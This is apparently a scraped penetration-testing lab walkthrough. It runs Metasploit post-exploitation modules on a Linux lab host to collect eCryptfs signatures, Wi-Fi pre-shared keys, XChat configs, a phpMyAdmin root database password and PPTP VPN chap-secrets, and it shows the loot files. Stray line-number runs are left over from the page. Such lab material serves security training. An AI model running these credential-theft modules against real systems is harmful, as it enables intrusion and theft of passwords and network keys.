msf5 post(linux/gather/ecryptfs_creds) > set SESSION 1
SESSION => 1
msf5 post(linux/gather/ecryptfs_creds) > exploit

[!] SESSION may not be compatible with this module.
[*] Finding .ecryptfs directories
[*] Looting 1 directories
[*] Downloading /root/.ecryptfs/sig-cache.txt -> sig-cache.txt
[+] File stored in: /root/.msf4/loot/20230324143535_default_192.198.6.3_ecryptfs.sigcac_464389.txt
[*] Post module execution completed
1
2
3
4
5
6
7
8
9
10
11
12
13
msf5 post(linux/gather/ecryptfs_creds) > loot

Loot
====

host         service  type                    name                   content     info                            path
----         -------  ----                    ----                   -------     ----                            ----
192.198.6.3           ecryptfs.sig-cache.txt                         text/plain  eCryptfs sig-cache.txt File     /root/.msf4/loot/20230324143535_default_192
.198.6.3_ecryptfs.sigcac_464389.txt
msf5 post(linux/gather/ecryptfs_creds) > cat /root/.msf4/loot/20230324143535_default_192.198.6.3_ecryptfs.sigcac_464389.txt
[*] exec: cat /root/.msf4/loot/20230324143535_default_192.198.6.3_ecryptfs.sigcac_464389.txt

3b32b64d6121597a
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
msf5 post(linux/gather/ecryptfs_creds) > use post/linux/gather/enum_psk
msf5 post(linux/gather/enum_psk) > info

       Name: Linux Gather 802-11-Wireless-Security Credentials
     Module: post/linux/gather/enum_psk
   Platform: Linux
       Arch: 
       Rank: Normal

Provided by:
  Cenk Kalpakoglu

Compatible session types:
  Meterpreter
  Shell

Basic options:
  Name     Current Setting                          Required  Description
  ----     ---------------                          --------  -----------
  DIR      /etc/NetworkManager/system-connections/  yes       The default path for network connections
  SESSION                                           yes       The session to run this module on.

Description:
  This module collects 802-11-Wireless-Security credentials such as 
  Access-Point name and Pre-Shared-Key from your target CLIENT Linux 
  machine using /etc/NetworkManager/system-connections/ files. The 
  module gathers NetworkManager's plaintext "psk" information.

msf5 post(linux/gather/enum_psk) > set SESSION 2
SESSION => 2
msf5 post(linux/gather/enum_psk) > exploit

[*] Reading file /etc/NetworkManager/system-connections/TopSecret_Network
[*] Reading file /etc/NetworkManager/system-connections/Wi-Fi connection 1
[*] Reading file /etc/NetworkManager/system-connections/Wi-Fi connection 2

802-11-wireless-security
========================

 AccessPoint-Name    PSK
 ----------------    ---
 Wi-Fi connection 1  AttackDefence_WiFi_123321
 Wi-Fi connection 2  Free_Internet

[+] Secrets stored in: /root/.msf4/loot/20230324144135_default_192.198.6.3_linux.psk.creds_605438.txt
[*] Done
[*] Post module execution completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
msf5 post(linux/gather/enum_psk) > loot

Loot
====

host         service  type                    name                      content     info                            path
----         -------  ----                    ----                      -------     ----                            ----
192.198.6.3           linux.psk.creds         wireless_credentials.txt  text/csv                                    /root/.msf4/loot/20230324144135_default_
192.198.6.3_linux.psk.creds_605438.txt
msf5 post(linux/gather/enum_psk) > cat /root/.msf4/loot/20230324144135_default_192.198.6.3_linux.psk.creds_605438.txt
[*] exec: cat /root/.msf4/loot/20230324144135_default_192.198.6.3_linux.psk.creds_605438.txt

AccessPoint-Name,PSK
"Wi-Fi connection 1","AttackDefence_WiFi_123321"
"Wi-Fi connection 2","Free_Internet"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
msf5 post(linux/gather/enum_psk) > use post/linux/gather/enum_xchat
msf5 post(linux/gather/enum_xchat) > info

       Name: Linux Gather XChat Enumeration
     Module: post/linux/gather/enum_xchat
   Platform: Linux
       Arch: 
       Rank: Normal

Provided by:
  sinn3r <sinn3r@metasploit.com>

Compatible session types:
  Meterpreter
  Shell

Available actions:
  Name     Description
  ----     -----------
  ALL      Collect both the plists and chat logs
  CHATS    Collect chat logs with a pattern
  CONFIGS  Collect XCHAT's config files

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module will collect XChat's config files and chat logs from the 
  victim's machine. There are three actions you may choose: CONFIGS, 
  CHATS, and ALL. The CONFIGS option can be used to collect 
  information such as channel settings, channel/server passwords, etc. 
  The CHATS option will simply download all the .log files.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
msf5 post(linux/gather/enum_xchat) > set SESSION 2
SESSION => 2
msf5 post(linux/gather/enum_xchat) > exploit

[+] 192.198.6.3:55958 - servlist_.conf saved as /root/.msf4/loot/20230324144821_default_192.198.6.3_xchat.config_717304.txt
[+] 192.198.6.3:55958 - xchat.conf saved as /root/.msf4/loot/20230324144821_default_192.198.6.3_xchat.config_128075.txt
[*] Post module execution completed
msf5 post(linux/gather/enum_xchat) > loot

Loot
====

host         service  type                    name                      content     info                            path
----         -------  ----                    ----                      -------     ----                            ----
192.198.6.3           xchat.config            servlist_.conf            text/plain                                  /root/.msf4/loot/20230324144821_default_
192.198.6.3_xchat.config_717304.txt
192.198.6.3           xchat.config            xchat.conf                text/plain                                  /root/.msf4/loot/20230324144821_default_
192.198.6.3_xchat.config_128075.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
msf5 post(linux/gather/enum_xchat) > cat /root/.msf4/loot/20230324144821_default_192.198.6.3_xchat.config_717304.txt
[*] exec: cat /root/.msf4/loot/20230324144821_default_192.198.6.3_xchat.config_717304.txt

v=2.8.8

N=irc.oftc.net
J=#llvm
E=IRC (Latin/Unicode Hybrid)
F=27
D=0
S=irc.oftc.net/6667

N=Debian Servers
J=#debian
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.debian.org

N=Ubuntu Servers
J=#ubuntu
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.ubuntu.com/8001

N=2600net
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.2600.net

N=7-indonesia
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.7-indonesia.org

N=AccessIRC
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.accessirc.net
S=eu.accessirc.net

N=AfterNET
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.afternet.org
S=us.afternet.org
S=eu.afternet.org

N=Aitvaras
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.data.lt/+6668
S=irc-ssl.omnitel.net/+6668
S=irc-ssl.le.lt/+9999
S=irc.data.lt
S=irc.omnitel.net
S=irc.ktu.lt
S=irc.le.lt
S=irc.takas.lt
S=irc.5ci.net
S=irc.kis.lt

N=AmigaNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.amiganet.org
S=us.amiganet.org
S=uk.amiganet.org

N=ARCNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=se1.arcnet.vapor.com
S=us1.arcnet.vapor.com
S=us2.arcnet.vapor.com
S=us3.arcnet.vapor.com
S=ca1.arcnet.vapor.com
S=de1.arcnet.vapor.com
S=de3.arcnet.vapor.com
S=ch1.arcnet.vapor.com
S=be1.arcnet.vapor.com
S=nl3.arcnet.vapor.com
S=uk1.arcnet.vapor.com
S=uk2.arcnet.vapor.com
S=fr1.arcnet.vapor.com

N=AstroLink
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.astrolink.org

N=AustNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=au.austnet.org
S=us.austnet.org
S=ca.austnet.org

N=AzzurraNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.azzurra.org
S=crypto.azzurra.org

N=Beirut
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.beirut.com

N=ChattingAway
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.chattingaway.com

N=ChatJunkies
J=#xchat
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.chatjunkies.org
S=nl.chatjunkies.org

N=ChatNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=US.ChatNet.Org
S=EU.ChatNet.Org

N=ChatSociety
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=us.chatsociety.net
S=eu.chatsociety.net

N=ChatSpike
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.chatspike.net

N=ChillFactory
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.chillfactory.net

N=CoolChat
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.coolchat.net

N=Criten
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.criten.net
S=irc.eu.criten.net

N=DALnet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.dal.net
S=irc.eu.dal.net

N=Dark-Tou-Net
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.d-t-net.de
S=bw.d-t-net.de
S=nc.d-t-net.de
S=wakka.d-t-net.de

N=DarkMyst
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.darkmyst.org

N=DeepIRC
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.deepirc.net

N=DeltaAnime
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.deltaanime.net

N=EFnet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.blackened.com
S=irc.Prison.NET
S=irc.Qeast.net
S=irc.efnet.pl
S=efnet.demon.co.uk
S=irc.lightning.net
S=irc.mindspring.com
S=irc.easynews.com
S=irc.servercentral.net

N=EnterTheGame
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=IRC.EnterTheGame.Com

N=EUIrc
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.euirc.net
S=irc.ham.de.euirc.net
S=irc.ber.de.euirc.net
S=irc.ffm.de.euirc.net
S=irc.bre.de.euirc.net
S=irc.hes.de.euirc.net
S=irc.vie.at.euirc.net
S=irc.inn.at.euirc.net
S=irc.bas.ch.euirc.net

N=EuropNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.europnet.org

N=EU-IRC
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.eu-irc.net

N=FDFNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.fdfnet.net
S=irc.eu.fdfnet.net

N=FEFNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.fef.net
S=irc.ggn.net
S=irc.vendetta.com

N=FreeNode
J=#vim,#python,#bash
E=IRC (Latin/Unicode Hybrid)
F=27
D=0
S=irc.freenode.net/8001

N=GalaxyNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.galaxynet.org

N=GamesNET
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.gamesnet.net
S=irc.ca.gamesnet.net
S=irc.eu.gamesnet.net

N=GeekShed
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.geekshed.net

N=German-Elite
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=dominion.german-elite.net
S=komatu.german-elite.net

N=GimpNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.gimp.org
S=irc.us.gimp.org

N=HabberNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.habber.net

N=Hashmark
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.hashmark.net

N=IdleMonkeys
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.idlemonkeys.net

N=iZ-smart.net
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.iZ-smart.net/6666
S=irc.iZ-smart.net/6667
S=irc.iZ-smart.net/6668

N=IrcLink
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.irclink.net
S=Alesund.no.eu.irclink.net
S=Oslo.no.eu.irclink.net
S=frogn.no.eu.irclink.net
S=tonsberg.no.eu.irclink.net

N=IRCNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.ircnet.com
S=irc.stealth.net/6668
S=ircnet.demon.co.uk
S=irc.datacomm.ch
S=random.ircd.de
S=ircnet.netvision.net.il
S=irc.cs.hut.fi

N=Irctoo.net
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.irctoo.net

N=Krstarica
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.krstarica.com

N=Librenet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.librenet.net
S=ielf.fr.librenet.net

N=LinkNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.link-net.org
S=irc.no.link-net.org
S=irc.bahnhof.se

N=MagicStar
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.magicstar.net

N=Majistic
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.majistic.net

N=MindForge
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.mindforge.org

N=MintIRC
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.mintirc.net

N=MIXXnet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.mixxnet.net

N=NeverNET
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.nevernet.net
S=imagine.nevernet.net
S=dimension.nevernet.net
S=universe.nevernet.net
S=wayland.nevernet.net
S=forte.nevernet.net

N=NixHelpNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.nixhelp.org
S=us.nixhelp.org
S=uk.nixhelp.org
S=uk2.nixhelp.org
S=uk3.nixhelp.org
S=nl.nixhelp.org
S=ca.ld.nixhelp.org
S=us.co.nixhelp.org
S=us.ca.nixhelp.org
S=us.pa.nixhelp.org

N=NullusNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.nullus.net

N=Oceanius
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.oceanius.com

N=OFTC
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.oftc.net

N=OtherNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.othernet.org

N=OzNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.oz.org
S=germany.oz.org
S=sandiego.oz.org
S=us.oz.org
S=au.oz.org
S=rockhampton.oz.org
S=wollongong.oz.org
S=waix.oz.org

N=PTlink
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.PTlink.net
S=aaia.PTlink.net

N=PTNet, ISP's
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.PTNet.org
S=rccn.PTnet.org
S=EUnet.PTnet.org
S=madinfo.PTnet.org
S=netc2.PTnet.org
S=netc1.PTnet.org
S=telepac1.ptnet.org
S=esoterica.PTnet.org
S=ip-hub.ptnet.org
S=telepac1.ptnet.org
S=nortenet.PTnet.org

N=PTNet, UNI
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.PTNet.org
S=rccn.PTnet.org
S=uevora.PTnet.org
S=umoderna.PTnet.org
S=ist.PTnet.org
S=aaum.PTnet.org
S=uc.PTnet.org
S=ualg.ptnet.org
S=madinfo.PTnet.org
S=ua.PTnet.org
S=ipg.PTnet.org
S=isec.PTnet.org
S=utad.PTnet.org
S=iscte.PTnet.org
S=ubi.PTnet.org

N=QuakeNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.quakenet.org
S=irc.se.quakenet.org
S=irc.dk.quakenet.org
S=irc.no.quakenet.org
S=irc.fi.quakenet.org
S=irc.be.quakenet.org
S=irc.uk.quakenet.org
S=irc.de.quakenet.org
S=irc.it.quakenet.org

N=RebelChat
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.rebelchat.org

N=RizeNET
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.rizenet.org
S=omega.rizenet.org
S=evelance.rizenet.org
S=lisa.rizenet.org
S=scott.rizenet.org

N=Rizon
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.rizon.net

N=RusNet
E=KOI8-R (Cyrillic)
F=19
D=0
S=irc.tomsk.net
S=irc.rinet.ru
S=irc.run.net
S=irc.ru
S=irc.lucky.net

N=SceneNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.scene.org
S=irc.eu.scene.org
S=irc.us.scene.org

N=SeilEn.de
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.seilen.de

N=SlashNET
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.slashnet.org
S=area51.slashnet.org
S=moo.slashnet.org
S=radon.slashnet.org

N=Sohbet.Net
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.sohbet.net

N=SolidIRC
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.solidirc.com

N=SorceryNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.sorcery.net/9000
S=irc.us.sorcery.net/9000
S=irc.eu.sorcery.net/9000

N=Spidernet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=us.spidernet.org
S=eu.spidernet.org
S=irc.spidernet.org

N=StarChat
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.starchat.net
S=gainesville.starchat.net
S=freebsd.starchat.net
S=sunset.starchat.net
S=revenge.starchat.net
S=tahoma.starchat.net
S=neo.starchat.net

N=TNI3
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.tni3.com

N=TURLINet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.turli.net
S=irc.servx.ru
S=irc.gavnos.ru

N=UnderNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=us.undernet.org
S=eu.undernet.org

N=UniBG
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.lirex.com
S=irc.naturella.com
S=irc.spnet.net
S=irc.techno-link.com
S=irc.telecoms.bg
S=irc.tu-varna.edu

N=Whiffle
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.whiffle.org

N=Worldnet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.worldnet.net
S=irc.fr.worldnet.net

N=Xentonix.net
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.xentonix.net

N=XWorld
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=Buffalo.NY.US.XWorld.org
S=Minneapolis.MN.US.Xworld.Org
S=Rochester.NY.US.XWorld.org
S=Bayern.DE.EU.XWorld.Org
S=Chicago.IL.US.XWorld.Org
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
msf5 post(linux/gather/enum_xchat) > cat /root/.msf4/loot/20230324144821_default_192.198.6.3_xchat.config_128075.txt
[*] exec: cat /root/.msf4/loot/20230324144821_default_192.198.6.3_xchat.config_128075.txt

version = 2.8.8
auto_save = 1
auto_save_url = 0
away_auto_unmark = 0
away_reason = I'm busy
away_show_message = 0
away_show_once = 1
away_size_max = 300
away_timeout = 60
away_track = 1
completion_amount = 5
completion_auto = 0
completion_sort = 0
completion_suffix = :
dcc_auto_chat = 0
dcc_auto_resume = 1
dcc_auto_send = 2
dcc_blocksize = 1024
dcc_completed_dir = 
dcc_fast_send = 1
dcc_global_max_get_cps = 0
dcc_global_max_send_cps = 0
dcc_ip = 
dcc_ip_from_server = 1
dcc_max_get_cps = 0
dcc_max_send_cps = 0
dcc_permissions = 384
dcc_port_first = 0
dcc_port_last = 0
dcc_remove = 0
dcc_save_nick = 0
dcc_send_fillspaces = 0
dcc_stall_timeout = 60
dcc_timeout = 180
dnsprogram = host
flood_ctcp_num = 5
flood_ctcp_time = 30
flood_msg_num = 5
flood_msg_time = 30
gui_auto_open_chat = 1
gui_auto_open_dialog = 1
gui_auto_open_recv = 1
gui_auto_open_send = 1
gui_dialog_height = 256
gui_dialog_left = 0
gui_dialog_top = 0
gui_dialog_width = 500
gui_hide_menu = 1
gui_input_spell = 1
gui_input_style = 0
gui_join_dialog = 0
gui_lagometer = 1
gui_mode_buttons = 0
gui_pane_left_size = 127
gui_pane_right_size = 100
gui_quit_dialog = 0
gui_slist_select = 28
gui_slist_skip = 1
gui_throttlemeter = 1
gui_topicbar = 0
gui_tray = 0
gui_tray_flags = 0
gui_tweaks = 0
gui_ulist_buttons = 0
gui_ulist_doubleclick = QUOTE WHOIS %s %s
gui_ulist_hide = 1
gui_ulist_left = 0
gui_ulist_pos = 3
gui_ulist_resizable = 1
gui_ulist_show_hosts = 0
gui_ulist_sort = 0
gui_ulist_style = 1
gui_url_mod = 4
gui_usermenu = 0
gui_win_height = 646
gui_win_left = 142
gui_win_save = 1
gui_win_state = 0
gui_win_top = 20
gui_win_width = 995
input_balloon_chans = 0
input_balloon_hilight = 1
input_balloon_priv = 1
input_balloon_time = 20
input_beep_chans = 0
input_beep_hilight = 0
input_beep_msg = 0
input_command_char = /
input_filter_beep = 0
input_flash_chans = 0
input_flash_hilight = 1
input_flash_priv = 1
input_perc_ascii = 0
input_perc_color = 0
input_tray_chans = 0
input_tray_hilight = 1
input_tray_priv = 1
irc_auto_rejoin = 0
irc_ban_type = 2
irc_conf_mode = 0
irc_extra_hilight = 
irc_hide_version = 0
irc_id_ntext = 
irc_id_ytext = 
irc_invisible = 0
irc_join_delay = 3
irc_logging = 0
irc_logmask = %n-%c.log
irc_nick_hilight = 
irc_no_hilight = NickServ,ChanServ
irc_part_reason = Leaving
irc_quit_reason = Leaving
irc_raw_modes = 0
irc_servernotice = 0
irc_skip_motd = 0
irc_wallops = 0
irc_who_join = 1
irc_whois_front = 0
net_auto_reconnect = 1
net_auto_reconnectonfail = 0
net_bind_host = 
net_ping_timeout = 0
net_proxy_auth = 0
net_proxy_host = 
net_proxy_pass = 
net_proxy_port = 0
net_proxy_type = 0
net_proxy_use = 0
net_proxy_user = 
net_reconnect_delay = 10
net_throttle = 1
notify_timeout = 15
notify_whois_online = 0
perl_warnings = 0
sound_command = 
stamp_log = 1
stamp_log_format = %b %d %H:%M:%S 
stamp_text = 1
stamp_text_format = 16-%M-0
tab_chans = 1
tab_dialogs = 1
tab_layout = 2
tab_new_to_front = 2
tab_notices = 1
tab_pos = 1
tab_position = 2
tab_server = 1
tab_small = 0
tab_sort = 1
tab_trunc = 20
tab_utils = 0
text_background = 
text_color_nicks = 0
text_font = DejaVu Sans Mono 8
text_indent = 1
text_max_indent = 256
text_max_lines = 500
text_replay = 0
text_show_marker = 1
text_show_sep = 1
text_stripcolor = 0
text_thin_sep = 1
text_tint_blue = 220
text_tint_green = 220
text_tint_red = 220
text_transparent = 1
text_wordwrap = 1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
msf5 post(linux/gather/enum_xchat) > use post/linux/gather/phpmyadmin_credsteal
msf5 post(linux/gather/phpmyadmin_credsteal) > info

       Name: Phpmyadmin credentials stealer
     Module: post/linux/gather/phpmyadmin_credsteal
   Platform: Linux
       Arch: 
       Rank: Normal

Provided by:
  Chaitanya Haritash [bofheaded]
  Dhiraj Mishra <dhiraj@notsosecure.com>

Compatible session types:
  Meterpreter

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module gathers Phpmyadmin creds from target linux machine.

msf5 post(linux/gather/phpmyadmin_credsteal) > set SESSION 2
SESSION => 2
msf5 post(linux/gather/phpmyadmin_credsteal) > exploit


PhpMyAdmin Creds Stealer!

[+] PhpMyAdmin config found!
[+] Extracting creds
[+] User: root
[+] Password: N0tE@syT0Guess!!
[*] Storing credentials...
[+] Config file located at /root/.msf4/loot/20230324145715_default_192.198.6.3_phpmyadmin_conf_237256.txt
[*] Post module execution completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
msf5 post(linux/gather/phpmyadmin_credsteal) > loot

Loot
====

host         service  type                    name                      content     info                            path
----         -------  ----                    ----                      -------     ----                            ----
192.198.6.3           phpmyadmin_conf         phpmyadmin_conf.txt       text/plain  phpmyadmin_conf                 /root/.msf4/loot/20230324145715_default_
192.198.6.3_phpmyadmin_conf_237256.txt
msf5 post(linux/gather/phpmyadmin_credsteal) > cat /root/.msf4/loot/20230324145715_default_192.198.6.3_phpmyadmin_conf_237256.txt
[*] exec: cat /root/.msf4/loot/20230324145715_default_192.198.6.3_phpmyadmin_conf_237256.txt

<?php
##
## database access settings in php format
## automatically generated from /etc/dbconfig-common/phpmyadmin.conf
## by /usr/sbin/dbconfig-generate-include
##
## by default this file is managed via ucf, so you shouldn't have to
## worry about manual changes being silently discarded.  *however*,
## you'll probably also want to edit the configuration file mentioned
## above too.
##
$dbuser='root';
$dbpass='N0tE@syT0Guess!!';
$basepath='';
$dbname='phpmyadmin';
$dbserver='localhost';
$dbport='';
$dbtype='mysql';
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
msf5 post(linux/gather/phpmyadmin_credsteal) > use post/linux/gather/pptpd_chap_secrets
msf5 post(linux/gather/pptpd_chap_secrets) > info

       Name: Linux Gather PPTP VPN chap-secrets Credentials
     Module: post/linux/gather/pptpd_chap_secrets
   Platform: Linux
       Arch: 
       Rank: Normal

Provided by:
  sinn3r <sinn3r@metasploit.com>

Compatible session types:
  Meterpreter
  Shell

Basic options:
  Name     Current Setting        Required  Description
  ----     ---------------        --------  -----------
  FILE     /etc/ppp/chap-secrets  yes       The default path for chap-secrets
  SESSION                         yes       The session to run this module on.

Description:
  This module collects PPTP VPN information such as client, server, 
  password, and IP from your target server's chap-secrets file.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
msf5 post(linux/gather/pptpd_chap_secrets) > set SESSION 2
SESSION => 2
msf5 post(linux/gather/pptpd_chap_secrets) > exploit

PPTPd chap-secrets
==================

 Client  Server                Secret          IP
 ------  ------                ------          --
 jackie  attackdefense.com     HiddenNetwork   10.10.10.10
 ninja   pentesteracademy.com  LearningIsReal  216.146.39.125
 peter   underground.onion     ReallySecure!!  246.234.63.133

[+] Secrets stored in: /root/.msf4/loot/20230324150314_default_192.198.6.3_linux.chapsecret_875395.txt
[*] Post module execution completed

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
msf5 post(linux/gather/pptpd_chap_secrets) > loot

Loot
====

host         service  type                     name                      content     info                            path
----         -------  ----                     ----                      -------     ----                            ----
